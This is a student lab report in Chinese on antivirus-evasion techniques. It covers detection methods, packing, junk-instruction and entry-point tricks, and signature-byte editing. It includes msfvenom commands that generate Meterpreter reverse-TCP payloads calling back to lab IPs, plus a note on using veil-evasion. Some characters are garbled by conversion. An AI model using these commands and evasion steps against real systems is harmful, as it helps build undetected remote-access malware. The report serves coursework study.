20169219《網路攻防》免殺技術學習總結

1：基於特徵碼

一段特徵碼就是一段或多段資料。（如果乙個可執行檔案（或其他執行的庫、指令碼等）包含這樣的資料則被認為是惡意**）

防毒軟體有自己專門的特徵碼庫，在檢測乙個程式是否是惡意**時就看這個程式中的是否包含有特徵碼庫中的特徵碼，如果有就進行查殺。但是特徵碼庫並不是總是能第一時間更新，如果出現了特徵碼庫中沒有的新特徵碼，那麼就無法通過這種比對的方法進行查殺。

2：啟發式惡意軟體檢測

根據些片面特徵去推斷。其可以檢測0-day惡意軟體，具有一定通用性；但是其實時監控系統行為，開銷稍多，沒有基於特徵碼的精確度高。

3：基於行為的惡意軟體檢測

從理論上講，基於行為的檢測相當於是啟發式的一種，或者是加入了行為監控的啟發式。

免殺即使用不同方法使得惡意程式不被殺軟和防火牆發覺。

1、加殼脫殼與加密解密

利用特殊的演算法，對可執行檔案與動態庫里的資源進行壓縮與對檔案的描述、版本號、建立日期、修改軟體、系統執行需求等外層資料進行偽裝。

2、加花指令與程式入口點修改

加花指令就是在程式開頭加入一段計算用的彙編指令和一些入口點記憶體位址的亂跳轉，或加上其他常用程式特有的入口指令來迷惑防毒軟體。因為計算與跳轉的最後結果是沒有實質的意義的，所以這麼做並不影響程式的正常執行。但能使一些防毒軟體無法正確識別木馬程式，從而達到免殺的效果。

程式入口點修改就是改變入口點，通常用到的方法是在入口點的位址加1或把入口點位址拆開，也有加花指令之後把原入口點修改到花指令的入口點上令電腦先處理那段沒意義的指令，再在花指令後再加跳轉**，跳轉到程式執行資料的入口點上，令程式正常執行。

3、記憶體、檔案特徵碼的定位與修改

首先用特徵碼定位軟體定位檔案特徵碼的所在之處，再用ultraedit對被定位的特徵碼段進行修改。

一般修改方法有：

十六進製制的特徵碼直接修改法，就是把十六進製制的特徵碼加1；

字串大小寫修改法，就是特徵碼所對應的內容是字串的時候，把大小字互換；

等價替換法，就是當特徵碼所對應的是彙編指令時，把指令替換成功能類擬的指令；

指令順序調換法，把特徵碼對應的彙編指令的順序互換；

通用跳轉法，用跳轉的方法把特徵碼對應的彙編指令跳轉走，猶如加花一樣。

4、整合在盜版軟體中，誘使使用者使用時關閉殺軟防火牆。

實踐內容：

(1)理解免殺技術原理

(2)正確使用msf編碼器，veil-evasion，自己利用shellcode程式設計等免殺工具或技巧；

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.6.113 lport=5329 -f exe > 19met-encoded.exe

對生成的檔案用virscan進行檢測，結果如下

首先要先安裝veil-evasion

使用如下命令進行安裝

apt-get update apt-get install veil-evasion

安裝完成之後，直接輸入veil-evasion進入程式

接下來逐步輸入如下命令，生成11111.exe

對生成的11111.exe檔案在進行檢測

還是不能免殺成功

使用命令msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.69.116 lport=443 -f c生成乙個c格式的十六進製制陣列

編寫程式生成.exe檔案，並掃瞄

實現真正的免殺還是有一定困難的，及時實現免殺，如何將惡意**植入使用者的使用程式還是很困難的問題。

一種新的病毒出現，防毒軟體真正發揮作用還是有一段時間的，肯定會有使用者程式被病毒感染，所以要提高自己的安全意識；

操作過程中只能按照教程一步一步來，自己對免殺實際的作用方法理解還不透徹，程式設計能力還不夠。